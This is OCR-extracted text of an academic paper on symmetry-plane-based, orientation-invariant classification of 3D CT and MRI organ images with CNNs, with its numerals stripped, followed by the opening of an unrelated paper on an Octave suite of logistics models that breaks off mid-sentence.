( ) for the pathological classification of brain ct images (captured by the same scanner) as normal, (evidence of) blood, or stroke. first, in a pre-processing step, they manually realigned all images so that the mid-sagittal plane was at the middle of the image. then, considering the symmetry of the image, they extracted image features from half of each d slice (in the superior-inferior direction) and used kernel regression for classification. a limitation of conventional classification methods such as these, is that the most appropriate features for a given problem have to be extracted first, in order to train the classifiers. in contrast, deep learning techniques such as deep convolutional neural networks (dcnns) extract the features as part of the learning process, thereby ensuring that the optimal features for a given task are extracted. a d dcnn was used by ahn ( ) to classify lung cancer (cancer positive or negative) from ct images. the author modified the squeezenet (iandola et al., ) architecture (which is traditionally suitable for d images) to obtain squeezenet d which is appropriate for d image classification. liu & kang ( ) introduced a lung nodule classification approach by using a multi- view dcnn for ct images. they obtained a d volume by considering multiple views of a given nodule (patches of different sizes around the nodule) prior to classification. they performed two classifications: binary (benign or malignant) and ternary (benign, primary malignant, or metastatic malignant). jin et al. ( ) modified the alexnet (krizhevsky, sutskever & hinton, ) architecture to make it suitable for the classification of d ct images of lungs. they segmented the lungs from the ct image using a pre-processing step and performed a binary classification (cancer or not) on the resulting image. instead of using d dcnns, other researchers have considered how d dcnns can be used to classify d medical images. for example, qayyum et al. ( ) used each and every d slice of a d image islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as input to a d dcnn. they classified the images into classes and used a publicly available d medical image database to evaluate their methodology. usually d medical images are captured/reconstructed so that they are consistent with respect to viewing direction and patient orientation (rotation and translation). for example, image slices are typically taken in the superior-inferior direction. an effort is made to ensure that the patient is aligned in such a way that the mid-sagittal and mid-coronal planes are aligned at the middle of the image. thus, most classification methods assume that these requirements are met (e.g., qayyum et al., ). as such, they may not perform well if these assumptions are violated. others perform manual pre-processing prior to the classification to avoid this issue (e.g., liu & dellaert, ). in this paper, we consider the specific case of d organ image classification and propose an algorithm that is robust against rotation and translation. to this end, we exploit the fact that the human body is roughly symmetric, and extract a d slice from the plane of best symmetry from a d image of the organ in a pre-processing step. we consider this slice to be representative of the d image, as it provides a relatively consistent cross-section of the d image, irrespective of its orientation. then, we use this ‘representative’ d image to train a d dcnn to classify the d image. as discussed later, simplicity is one of the major features of the algorithm we propose. we show through experiments performed on publicly available muliti-modal (ct and mri) data that ( ) the proposed method is as accurate as other similar methods when the above assumptions are met, ( ) it significantly outperforms other methods when faced with rotated and/or translated data, ( ) the training time of the proposed method is low, and ( ) it achieves similarly high results when used with other dcnn architectures. materials and methods in this section, we discuss the steps of the algorithm we propose for rotation and translation invariant d organ image classification: volume reconstruction, segmentation, symmetry plane extraction, and classification using a dcnn. volume reconstruction first, we loaded the d slices of a dicom image into a d array considering the instancenumber in the metadata to be the z dimension. as the slice thickness (z spacing) is not necessarily the same as the pixel spacing, this volume does not represent the real-world shape of the imaged organ/body part. to retain the actual shape, we resampled the d image using cubic interpolation (miklos, ). the new array size for the resampled image was calculated using eq. ( ) where [nx,ny,nz] is the original array size, psx and psy are the x and y spacings respectively (pixelspacing in metadata), and st is the z spacing (slicethickness in metadata). an example of a volume reconstruction is shown in fig. . [nx,ny,nz]= [ nx, ny∗psy psx , nz ∗st psx ] ( ) islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure volume reconstruction from dicom images: (a) stack of d slices, (b) reconstructed d volume, and (c) resampled d volume. full-size doi: . /peerjcs. /fig- figure multi-level volume thresholding: (a) resampled volume from the previous step, (b) seg- mented volume, and (c) resulting point cloud. full-size doi: . /peerjcs. /fig- d volume segmentation to segment the organ(s) from the background, we used a multi-level global thresholding using otsu’s method (otsu, ). we used two thresholds and considered the voxels with intensity values within these thresholds to be the organ(s). this provides a segmentation (point cloud) of the organ(s) and also avoids the inclusion of possible imaging artifacts at the extremes of the intensity spectrum. an example of the segmentation process is shown in fig. . note that this is a simple segmentation process, and as such, does not provide an exact segmentation. however, from our results, we observed that this was sufficient for our purpose: simplifying the symmetry plane calculation in the next step of our algorithm. representative d image extraction we calculated the plane of best symmetry from the point cloud resulting from the previous step using the method discussed in cicconet, hildebrand & elliott ( ). they calculated islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure representative d image extraction: (a) segmented volume, (b) segmented point cloud with the plane of best symmetry shown as a circular plane, and (c) d image extracted from the symmetry plane. full-size doi: . /peerjcs. /fig- the reflection of a point cloud around an arbitrary plane, used the iterative closest point algorithm (besl & mckay, ) to register the original and reflected point clouds, and solved an eigenvalue problem related to the global transformation that was applied to the original data during registration. the first eigenvector in this solution is the normal to the plane of best symmetry. we extracted the d image resulting from the intersection of this plane with the d volume using the nearest neighbour method (miklos, ). we considered the second and third eigenvectors to be the x and y axes for this d image respectively. we determined the bounds of the d image to be the minimum and maximum values resulting from the projections of the d volume vertices on the axes and the origin to be the middle of these minimum and maximum values. figure shows the extraction of the plane of best symmetry. although the accuracy of the symmetry plane calculation depends on the segmentation step, and this can be avoided by using algorithms that minimize the distance between intensity values of voxels (tuzikov, colliot & bloch, ; teverovskiy & li, ) instead, using the segmented point cloud is more efficient. as we found it is sufficient for our purposes, we used this method of symmetry plane calculation for the sake of efficiency. classification using a dcnn due to the roughly symmetric nature of the human body, the d images resulting from the previous step provide relatively consistent cross-sections of the d images. as such, we used these d images to train a standard d dcnn for the classification task. the dcnn used here consisted of layers: one image input layer, four convolution layers, four batch normalization layers, four rectified linear unit (relu) (nair & hinton, ) layers, four max poling layers, one fully connected layer, one softmax layer, and one classification output layer. we resized the images to the size of × and normalized the intensity values to be in the range of [ ]. figure illustrates the dcnn architecture. islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure deep convolutional neural network architecture. full-size doi: . /peerjcs. /fig- results in this section, we discuss the performance metrics and databases used in the experiments, the implementation/extension of existing methods, and the experimental results. all experiments were performed in matlab r© (mathworks inc., ) on a hp z g workstation running windows r© education on an intel r© xeon r© silver cpu with a clock speed of . ghz, gb ram, and a nvidia r© quadro r© p gpu. performance evaluation metrics to evaluate classification performance, we used commonly utilized metrics (accuracy and mean value of sensitivity, specificity, precision, f-measure, and g-mean) (japkowicz, ; powers, ; olson & delen, ). these metrics are defined in eqs. ( )–( ) with respect to values of the confusion matrix: true positives (tp), true negatives (tn), false positives (fp), and false negatives (fn). accuracy = tp+tn tp+fn +fp+tn ( ) sensitivity = tp tp+fn ( ) specificity = tn tn +fp ( ) precision = tp tp+fp ( ) f−measure = × ( tp tp+fp × tp tp+fn tp tp+fp + tp tp+fn ) ( ) g−mean = √ tp tp+fn × tn tn +fp ( ) islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure database formation. full-size doi: . /peerjcs. /fig- databases we collected data from a publicly available d medical image database for our experiments: the cancer imaging archive (tcia) (clark et al., ). tcia stores a large number of multi-modal medical images stored in the digital imaging and communications in medicine (dicom) file format. from this database, we collected data (ct and mri) for four classes that define different areas of the human body: head, thorax, breast, and abdomen. some images, such as those that had a very low number of d dicom slices and those with inconsistent imaging directions, were removed from our database. a total of d images were obtained ( images per class). seventy percent of the images were used for training and the remaining thirty percent were used for testing. in addition to the original testing database, we created two other databases by ( ) randomly rotating and translating and ( ) randomly swapping the axes of the original test data. the former database was used to test for rotation and translation (patient orientation) invariance and the latter was used to test for robustness against changes in the imaging direction. in addition to this, we created an augmented training database by randomly rotating and translating % of the original training data, and randomly swapping axes of the remaining %. figure illustrates this process. to generate the transformed data that simulated changes in patient orientation (in the transformed test database and the augmented training database), we performed a random rotation in the range of [− ] with respect to the three coordinate axes and a random translation of [− ] along the coordinate axes on each image. figure shows an example of such a d transformation. to obtain the axis swapped data that simulated changes in imaging direction (in the axis swapped test database and the augmented training database), we randomly changed the axes of the original data. note that this is synonymous to rotations of around the x, y, or z axis. an example of a random axis swapping is shown in fig. . islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure an example of a random d transformation: (a) original volume, (b) transformed volume (a rotation of + counterclockwise around the z axis and a translation of [ , , ] in the x, y, and z di- rection respectively), and (c) mid-axial slices of both original and transformed volumes. full-size doi: . /peerjcs. /fig- figure an example of a random d axis swapping: (a) original volume, (b) axis swapped volume with the x axis changed to the y axis and z axis changed to the x axis, and (c) mid-axial slices of both original and axis swapped volumes. full-size doi: . /peerjcs. /fig- performance comparison with other similar methods we evaluated our method against similar existing methods. we reimplemented the method of qayyum et al. ( ) that used all d slices to represent the d volume. we implemented their dcnn in matlab and used all slices of the training and testing sets respectively to train and evaluate this method. as the authors used images of size × as their input, we also performed the same resizing of the data in a pre-processing step. we also implemented the method used in the classification of d lung images introduced in jin et al. ( ). they used thresholds based on the hounsfield unit (hu) to extract an initial mask from ct images and used morphological operations to fill holes in this mask. then, they segmented the lungs using this mask and trained a dcnn for the classification task. however, this method cannot be directly used in our problem. first, we have multi-modal data, and hence, it is not possible to use the hu scale, which is specific to ct images. second, we have images of different organs which would require the definition of organ specific thresholds. third, morphological operations require the input of the size of dilation/erosion which varies depending on the type of image. islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table performance comparison with similar existing methods (without data augmentation). best performance per metric per database is highlighted in bold. database methodology accuracy sensitivity specificity precision f-measure g-mean jin et al. ( ) . . . . . . qayyum et al. ( ) . . . . . . prasoon et al. ( ) . . . . . . ahn ( ) . . . . . . original proposed . . . . . . jin et al. ( ) . . . . . . qayyum et al. ( ) . . . . . . prasoon et al. ( ) . . . . . . ahn ( ) . . . . . . transformed proposed . . . . . . jin et al. ( ) . . . . . . qayyum et al. ( ) . . . . . . prasoon et al. ( ) . . . . . . ahn ( ) . . . . . . axis swapped proposed . . . . . . therefore, we used a process that can be generally applied to all images in our database. first, we created a binary mask using the multi-level global thresholding method discussed earlier. then, we used active contours introduced in chan & vese ( ) on the initial mask with iterations to fill in holes and obtain a more refined mask. finally, we extracted the organ from the background using this mask and used this as the input to the dcnn. jin et al. ( ) observed that an input image size of × × provided the best performance, and therefore, we also resized the input images to this size. another d medical image classification model we implemented was ahn ( ) which was used for lung image classification. the author performed an intensity normalization of their ct images based on the hu scale in a pre-processing step. due to the same reasons as above, we did not perform this normalization. we used the same resizing of the data they used ( × × ) in our implementation. as an additional method of comparison, we extended the idea presented in prasoon et al. ( ) for image segmentation, to make it applicable to our problem. they explored the classification of each voxel in d mri images for the purpose of knee cartilage segmentation. they extracted three d patches around a voxel in the x, y, and z directions, trained dcnns for each d patch, and combined the results of the three dcnns in the final layer. we applied this idea to our problem by extracting the mid slices in the three coordinate directions and training three dcnns similar to theirs. performance comparisons with respect to the metrics discussed above when trained on the original and augmented training datasets are shown in tables and respectively. performance with regards to training time is given in table . figure shows the islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table performance comparison with similar existing methods (with data augmentation by random transformation and axis swapping on training data). best performance per metric per database is highlighted in bold. database methodology accuracy sensitivity specificity precision f-measure g-mean jin et al. ( ) . . . . . . qayyum et al. ( ) . . . . . . prasoon et al. ( ) . . . . . . ahn ( ) . . . . . . original proposed . . . . . . jin et al. ( ) . . . . . . qayyum et al. ( ) . . . . . . prasoon et al. ( ) . . . . . . ahn ( ) . . . . . . transformed proposed . . . . . . jin et al. ( ) . . . . . . qayyum et al. ( ) . . . . . . prasoon et al. ( ) . . . . . . ahn ( ) . . . . . . axis swapped proposed . . . . . . table comparison of training time with similar existing methods. method pre-processing time (m) training time (m) total time (m) jin et al. ( ) qayyum et al. ( ) n/a prasoon et al. ( ) ahn ( ) proposed classification of some random examples using the proposed method, along with corresponding confidence levels. performance when used with other dcnns we also investigated the performance of our method when used with some existing state- of-the-art dcnns: alexnet (krizhevsky, sutskever & hinton, ), googlenet (szegedy et al., ), resnet- (he et al., ), and vgg- (simonyan & zisserman, ). to enable these dcnns to be used in our algorithm, we normalized the d images (extracted from the plane of best symmetry) prior to the classification depending on the requirements of each dcnn. the single channel d grey scale images were converted to three-channel colour images and resized to the size of × × for alexnet and × × for googlenet, resnet- , and vgg- . the performance results are shown in table . performance when used with conventional classifiers as conventional classification approaches, in concert with image feature extraction methods, have been used extensively for image classification, we also explored how to integrate the concepts discussed here with these methods. for this purpose, we used two islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure performance (confidence level of classification) of the proposed method with respect to some random images: (a) abdomen, . %, (b) abdomen, . %, (c) abdomen, . %, (d) head, . %, (e) head, %, (f) head, . %, (g) breast, %, (h) breast, %, (i) breast, %, (j) thorax, . %, (k) thorax, . %, and (l) thorax, . %. the images show the views extracted using the pro- posed algorithm from d ct and mri images in the test databases. note that the differences in the im- ages of the same class are caused by the simplicity of the segmentation method which influences the symmetry plane extraction. full-size doi: . /peerjcs. /fig- table performance of the proposed algorithm when used with other state-of-the-art dcnn models. database methodology accuracy sensitivity specificity precision f-measure g-mean alexnet . . . . . . googlenet . . . . . . resnet- . . . . . . original vgg- . . . . . . alexnet . . . . . . googlenet . . . . . . resnet- . . . . . . transformed vgg- . . . . . . alexnet . . . . . . googlenet . . . . . . resnet- . . . . . . axis swapped vgg- . . . . . . image feature extraction methods: bag of words (bow) (harris, ) and histogram of oriented gradients (hog) (dalal & triggs, ). to perform the classification task, we used support vector machines (svms) and artificial neural networks (anns) as they are widely used in classification. here we used five-fold cross-validation for the svm and hidden neurons for the ann. we normalised the d image slices resulting from the symmetry plane calculation to the size of × . the performance of these approaches is shown in table . discussion from the results in table , we observe that the proposed method is better than other similar methods (except for ahn ( ) which shows slightly better performance) when islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table performance of the proposed algorithm when used with conventional machine learning approaches. database methodology accuracy sensitivity specificity precision f-measure g-mean bow+svm . . . . . . bow+ann . . . . . . hog+svm . . . . . . original hog+ann . . . . . . bow+svm . . . . . . bow+ann . . . . . . hog+svm . . . . . . transformed hog+ann . . . . . . bow+svm . . . . . . bow+ann . . . . . . hog+svm . . . . . . axis swapped hog+ann . . . . . . applied to data that satisfied the conditions of consistent patient orientation and imaging direction when trained on the original (unaugmented) training database. however, ahn ( ) uses d dcnns in their classification and therefore, has a much slower training time when compared to the proposed method. as shown in table , even with a relatively higher pre-processing time, our method is the fastest in terms of total training time. also from table , we can see that the proposed method outperforms the other methods in the face of changes in patient orientation and imaging direction. although observe that some methods such as ahn ( ) and prasoon et al. ( ) are robust against patient orientation to some degree, they also fail when dealing with changes to imaging direction. performance of the compared methods on transformed and axis swapped data is improved when trained on augmented data, as seen in table . this is the result of the classifiers being trained on images of different orientations. however, the proposed method outperforms the other methods even when training was performed on augmented data. also, the results imply that data augmentation in the training phase is not required for our method. the high accuracy of the proposed method, specifically on transformed data, is mainly due to the fact that a relatively consistent d cross-sectional view of a d image is being used to represent the d image irrespective of orientation. as such, the variation in the input data per class is minimal and therefore, better classification can be achieved. comparison results shown in table reflect the robustness of the proposed method irrespective of the dcnn architecture used in the classification step. the performance results of the classifiers svm and ann, when combined with the feature extraction methods of bow and hog, show consistent but lower results (table ). this indicates that dcnns may be better suited for our application. the salient feature of this algorithm is its simplicity. first, we reduced the d classification problem to a d one by extracting the d image lying on the plane of best symmetry from the d volume. in this operation, we used calculations that were most efficient, such as simple thresholding techniques. it can be argued that using more sophisticated methods islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of segmentation would enable more accurate symmetry plane calculation, which in turn would make the d views extracted more consistent. furthermore, we rescaled the data to an -bit representation (intensity range of [ ]), thereby reducing the resolution of the data. however, we found that even in the face of such simplifications, the proposed method displayed very high levels of performance. as such, we can conclude that it has achieved a good balance between efficiency and accuracy. although the human body is roughly symmetric, most of the organs and how they are aligned inside the body are not perfectly symmetrical. furthermore, the data we considered here was from a cancer database where there is further asymmetry caused by tumors, lesions etc. our method was observed to perform well in these circumstances. however, we did not consider the effect of more exaggerated forms of asymmetry, for example, that caused by parts of an organ being cut off due to improper patient alignment. in the future, we will investigate how these forms of asymmetry affect the proposed method and how to compensate for them. we will also explore how it performs on other databases with higher numbers of classes. conclusion in this paper, we proposed a d organ image classification approach which is robust against patient orientation and changes in imaging direction. to this end, we extracted the plane of best symmetry from the d image and extracted the d image corresponding to that plane. then, we used a dcnn to classify the d image into one of four classes. we showed that this method is not only efficient and simple, but is also highly accurate in comparison to other similar methods. we also showed that this algorithm can be used in concert with other state-of-the-art dcnn models and also conventional classification techniques in combination with feature extraction methods. although our algorithm was specifically developed for d organ image classification, it is applicable to any classification task where a d image extracted from the plane of best symmetry of the d image is sufficient to represent the d image. acknowledgements the authors would like to thank dr. bridget copson of the department of medical imaging at st. vincent’s hospital, melbourne, australia, for her input on imaging techniques. additional information and declarations funding this work was supported by the university of melbourne under the melbourne research scholarship (mrs). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: university of melbourne. islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. competing interests the authors declare there are no competing interests. author contributions • kh tohidul islam and sudanthi wijewickrema conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • stephen o’leary conceived and designed the experiments, contributed reagents/ma- terials/analysis tools, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code is available in the supplemental information . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ahn bb. . the compact d convolutional neural network for medical images. stanford: standford university. arias j, martínez-gómez j, gámez ja, de herrera ags, müller h. . medical image modality classification using discrete bayesian networks. computer vision and image understanding : – doi . /j.cviu. . . . besl p, mckay nd. . a method for registration of -d shapes. ieee transactions on pattern analysis and machine intelligence ( ): – doi . / . . bicacro e, silveira m, marques js. . alternative feature extraction methods in d brain image-based diagnosis of alzheimer’s disease. in: th ieee international conference on image processing. piscataway: ieee doi . /icip. . . chan t, vese l. . active contours without edges. ieee transactions on image processing ( ): – doi . / . . cicconet m, hildebrand dgc, elliott h. . finding mirror symmetry via reg- istration and optimal symmetric pairwise assignment of curves. in: ieee international conference on computer vision workshops (iccvw). piscataway: ieee doi . /iccvw. . . clark k, vendt b, smith k, freymann j, kirby j, koppel p, moore s, phillips s, maffitt d, pringle m, tarbox l, prior f. . the cancer imaging archive (tcia): maintaining and operating a public information repository. journal of digital imaging ( ): – doi . /s - - - . cui x, liu y, shan s, chen x, gao w. . d haar-like features for pedestrian detection. piscataway: ieee doi . /icme. . . islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.cviu. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /icip. . http://dx.doi.org/ . / . http://dx.doi.org/ . /iccvw. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /icme. . http://dx.doi.org/ . /peerj-cs. dalal n, triggs b. . histograms of oriented gradients for human detection. in: ieee computer society conference on computer vision and pattern recognition (cvpr’ ), volume . piscataway: ieee, – doi . /cvpr. . . harris zs. . distributional structure. word ( – ): – doi . / . . . he k, zhang x, ren s, sun j. . deep residual learning for image recognition. in: ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee doi . /cvpr. . . iandola fn, han s, moskewicz mw, ashraf k, dally wj, keutzer k. . squeezenet: alexnet-level accuracy with x fewer parameters and < . mb model size. arxiv preprint. arxiv: . . japkowicz n. . why question machine learning evaluation methods. in: aaai workshop on evaluation methods for machine learning. new york: acm, – . jin t, cui h, zeng s, wang x. . learning deep spatial lung features by d convo- lutional neural network for early cancer detection. in: international conference on digital image computing: techniques and applications (dicta). piscataway: ieee doi . /dicta. . . krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep convolutional neural networks. in: pereira f, burges cjc, bottou l, weinberger kq, eds. advances in neural information processing systems . lake tahoe: curran associates, inc., – . kumar a, kim j, cai w, fulham m, feng d. . content-based medical image retrieval: a survey of applications to multidimensional and multimodality data. journal of digital imaging ( ): – doi . /s - - - . liu k, kang g. . multiview convolutional neural networks for lung nodule clas- sification. international journal of imaging systems and technology ( ): – doi . /ima. . liu y, dellaert f. . a classification based similarity metric for d image re- trieval. in: proceedings. ieee computer society conference on computer vi- sion and pattern recognition (cat. no. cb ). piscataway: ieee, – doi . /cvpr. . . mathworks, inc. . matlab. natick: mathworks, inc. available at https://www. mathworks.com/products/matlab.html. miklos p. . image interpolation techniques. in: nd siberian-hungarian joint symposium on intelligent systems. mohan g, subashini mm. . mri based medical image analysis: survey on brain tumor grade classification. biomedical signal processing and control : – doi . /j.bspc. . . . morgado p, silveira m, marques js. . diagnosis of alzheimer’s disease using d local binary patterns. computer methods in biomechanics and biomedical engineering: imaging & visualization ( ): – doi . / . . . islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . / . . http://dx.doi.org/ . /cvpr. . http://arxiv.org/abs/ . http://dx.doi.org/ . /dicta. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ima. http://dx.doi.org/ . /cvpr. . https://www.mathworks.com/products/matlab.html https://www.mathworks.com/products/matlab.html http://dx.doi.org/ . /j.bspc. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. nair v, hinton ge. . rectified linear units improve restricted boltzmann machines. in: proceedings of the th international conference on international conference on machine learning, icml’ . madison: omnipress, – . olson dl, delen d. . advanced data mining techniques. springer, berlin, heidel- berg: springer science & business media doi . / - - - - . otsu n. . a threshold selection method from gray-level histograms. ieee transac- tions on systems, man, and cybernetics ( ): – doi . /tsmc. . . Öziç mÜ, Özşen s. . t-test feature ranking based d mr classification with vbm mask. in: th signal processing and communications applications conference (siu). piscataway: ieee doi . /siu. . . powers dm. . evaluation: from precision, recall and f-measure to roc, in- formedness, markedness and correlation. journal of machine learning technologies ( ): – . prasoon a, petersen k, igel c, lauze f, dam e, nielsen m. . deep feature learning for knee cartilage segmentation using a triplanar convolutional neural network. in: advanced information systems engineering. springer, berlin, heidelberg: springer berlin heidelberg, – doi . / - - - - _ . qayyum a, anwar sm, awais m, majid m. . medical image retrieval using deep convolutional neural network. neurocomputing : – doi . /j.neucom. . . . research and markets. . medical imaging market—global outlook and forecast – . available at https://www.researchandmarkets.com/reports/ / (accessed on october ). simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv preprint. arxiv: . . szegedy c, liu w, jia y, sermanet p, reed s, anguelov d, erhan d, vanhoucke v, rabinovich a. . going deeper with convolutions. in: ieee con- ference on computer vision and pattern recognition (cvpr). piscataway: ieee doi . /cvpr. . . teverovskiy l, li y. . truly d midsagittal plane extraction for robust neuroimage registration. in: rd ieee international symposium on biomedical imaging: macro to nano, . piscataway: ieee, – doi . /isbi. . . tuzikov av, colliot o, bloch i. . evaluation of the symmetry plane in d mr brain images. pattern recognition letters ( ): – doi . /s - ( ) - . zhou x, hayashi t, hara t, fujita h, yokoyama r, kiryu t, hoshi h. . automatic segmentation and recognition of anatomical lung structures from high-resolution chest ct images. computerized medical imaging and graphics ( ): – doi . /j.compmedimag. . . . islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - http://dx.doi.org/ . /tsmc. . http://dx.doi.org/ . /siu. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.neucom. . . https://www.researchandmarkets.com/reports/ / http://arxiv.org/abs/ . http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /isbi. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.compmedimag. . . http://dx.doi.org/ . /peerj-cs. development of a coded suite of models to explore relevant problems in logistics development of a coded suite of models to explore relevant problems in logistics santiago-omar caballero-morales postgraduate department of logistics and supply chain management, universidad popular autonóma del estado de puebla, puebla, puebla, mexico abstract logistics is the aspect of the supply chain which is responsible of the efficient flow and delivery of goods or services from suppliers to customers. because a logistic system involves specialized operations such as inventory control, facility location and distribution planning, the logistic professional requires mathematical, technological and managerial skills and tools to design, adapt and improve these operations. the main research is focused on modeling and solving logistic problems through specialized tools such as integer programing and meta-heuristics methods. in practice, the use of these tools for large and complex problems requires mathematical and computational proficiency. in this context, the present work contributes with a coded suite of models to explore relevant problems by the logistic professional, undergraduate/postgraduate student and/or academic researcher. the functions of the coded suite address the following: ( ) generation of test instances for routing and facility location problems with real geographical coordinates; ( ) computation of euclidean, manhattan and geographical arc length distance metrics for routing and facility location problems; ( ) simulation of non- deterministic inventory control models; ( ) importing/exporting and plotting of input data and solutions for analysis and visualization by third-party platforms; and ( ) designing of a nearest-neighbor meta-heuristic to provide very suitable solutions for large vehicle routing and facility location problems. this work is completed by a discussion of a case study which integrates the functions of the coded suite. subjects algorithms and analysis of algorithms, computer education, databases, programming languages keywords facility location, vehicle routing, inventory management, metaheuristics, octave programming introduction research on supply chain (sc) management and logistics has been performed following quantitative (simulation, mathematical modeling and optimization) and qualitative (case study, interviews, empirical studies) approaches (sachan & datta, ). these approaches have been performed on the different logistic processes of the sc such as inventory control, transportation, production and distribution (lloyd et al., ; kuczyńska-chalada, furman & poloczek, ). transportation has been reported as the largest research topic in logistics (daugherty, bolumole & schwieterman, ). how to cite this article caballero-morales s-o. . development of a coded suite of models to explore relevant problems in logistics. peerj comput. sci. :e doi . /peerj-cs. submitted june accepted november published november corresponding author santiago-omar caballero-morales, santiagoomar.caballero@upaep.mx academic editor jingbo wang additional information and declarations can be found on page doi . /peerj-cs. copyright caballero-morales distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:santiagoomar.�caballero@�upaep.�mx https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ with the rise of industry . (which is associated to “internet of things” or “smart systems”) logistics faces the challenge to control all operations within enterprises cooperating in supply and logistic chains (kuczyńska-chalada, furman & poloczek, ). in this context, the use of (a) embedded systems and (b) intelligent systems are considered as vital resources to achieve smart and autonomous flow of raw materials, work-in-process, and distribution of end products throughout the sc in accordance to human planning (lloyd et al., ; kuczyńska-chalada, furman & poloczek, ). the development of intelligent systems is based on quantitative research as it involves optimization, mathematical modeling, simulation and statistical assessment. a key resource for these tasks is the availability of specialized data for analysis and testing. thus, research on state-of-the-art systems for transportation planning is supported by available databases of test sets (instances) such as tsplib (reinelt, , ) for the traveling salesman problem, cvrplib (uchoa et al., ; oliveira et al., ) for the vehicle routing problem, and sjc/p sets (chaves & nogueira-lorena, ; nogueira-lorena, ) for facility location problems. however, not all databases consider the different aspects of real logistics problems such as specific demand/location patterns and/or distance metrics. also, in practice, development and implementation of specific resources and solving methods are restricted by the required technical knowledge or proficiency associated to programing platforms and mathematical modeling. as presented in rao, stenger & wu ( ) the use of software programs, computer programing and spreadsheet modeling, are effective problem- solving tools within logistic education. hence, universities have revised their programs to provide qualified logistic professionals with these tools (erturgut, ). currently, there is an extensive portfolio of published educational resources for the logistic professional. for example, within the field of inventory control, the use of simulation software has been used with positive results (al-harkan & moncer, ; carotenuto, giordani & zaccaro, ). for vehicle routing and facility location problems, software such as vrp spreadsheet solver and the flp spreadsheet solver (which can solve problems with up to and customers respectively) (erdogan, a, b) can be effectively used for application and teaching purposes. while the methodological steps to use these tools are frequently reported within the respective literature (i.e., manuals, published articles), source data such as programing code and data sets is not explicitly or publicly available for sharing. also, license restrictions regarding the implementation software avoids the use of some simulation models for commercial purposes. the high costs of some of these licenses restrict their use by freelance professionals, micro, small and medium enterprises, which have limited economic resources. in this context, the present work describes the development of an open-source coded suite for the academic researcher and professional in logistics and supply chain management, with the purpose of supporting the modeling and programing skills required to implement and test more advanced methods as those reported in the scientific literature caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and/or shared in undergraduate/postgraduate courses. in particular, the following aspects are addressed: � generation of test instances for routing and facility location problems with real geographical coordinates; � computation of euclidean, manhattan and geographical arc length distance metrics for solving routing and facility location problems (symmetric and asymmetric metrics are considered); � importing/exporting and plotting of input data and solutions for analysis and visualization by third-party platforms; � simulation of non-deterministic inventory control models for assessment of supply strategies; � designing of a nearest-neighbor meta-heuristic to provide very suitable solutions for vehicle routing and facility location problems. as complementary material, a case study is solved with the integration of the functions of the coded suite. implementation of the coded suite was performed through the open source programing software gnu octave (eaton et al., ). the advantage of this software is that it runs on gnu/linux, macos, bsd, and windows, and it is compatible with many matlab scripts. also, its language syntax makes it easily adaptable to other languages such as c++. development of test instances the development of location data is important to test solving methods or algorithms for facility location and vehicle routing problems. to generate location data associated to real geographical coordinates the first step is to understand the coordinate system of the real world. figure presents the ranges for longitude and latitude coordinates (λ and ϕ respectively) of the world map. with these ranges the second step consists on generating location data within specific regions. in example, consider the region delimited by λ ∈ [− , − ] and ϕ ∈ [ , ]. a set of locations within this region can be generated through two approaches: � first, by adapting an already existing 